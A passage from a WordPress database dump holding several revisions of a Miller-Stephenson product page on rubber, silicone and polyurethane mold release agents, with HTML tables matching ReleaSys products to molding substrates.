Durability</td>\r\n</tr>\r\n<tr>\r\n<td>• Quick Dry; Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• No Transfer</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Technical Rubber (Neoprene, Nitrile)</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></td>\r\n<td>• Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Fast Cure (1-2 min)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Technical Rubber (Neoprene, Nitrile)</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Highly Filled Elastomer</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></td>\r\n<td>• Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Release most compounds</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Rubber to Metal Bonding</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></td>\r\n<td>• Multiple releases</td>\r\n</tr>\r\n<tr>\r\n<td>• No transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Rubber to Metal Bonding</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></td>\r\n<td>• Maximized Durability</td>\r\n</tr>\r\n<tr>\r\n<td>• Quick Dry; Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• No Transfer</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-04 19:29:10', '2016-11-04 19:29:10', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2898, 3, '2016-11-04 19:31:24', '2016-11-04 19:31:24', '<h1 style="text-align: justify;">Superior Performing Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements necessary in toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>, and our worldwide reputation for unsurpassed expertise, consistent quality, and value to help you find the solution you require. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds including silicone. Miller-Stephenson release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys Silicone Mold Release Agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Low Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide</h1>\r\n<table style="height: 1010px;" width="829">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Instantaneous Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal Rejection Rate</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Release most compounds</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Multiple releases</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-04 19:31:24', '2016-11-04 19:31:24', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2899, 3, '2016-11-04 19:53:15', '2016-11-04 19:53:15', '<h1 style="text-align: justify;">Superior Performing Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements necessary in toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>, and our worldwide reputation for unsurpassed expertise, consistent quality, and value to help you find the solution you require. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds including silicone. Miller-Stephenson release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys Silicone Mold Release Agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Low Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide</h1>\r\n<table style="height: 1010px;" width="829">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Instantaneous Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal Rejection Rate</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Release most compounds</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Multiple releases</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a>\r\n\r\n<a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-04 19:53:15', '2016-11-04 19:53:15', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2900, 3, '2016-11-04 19:53:39', '2016-11-04 19:53:39', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 105%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a 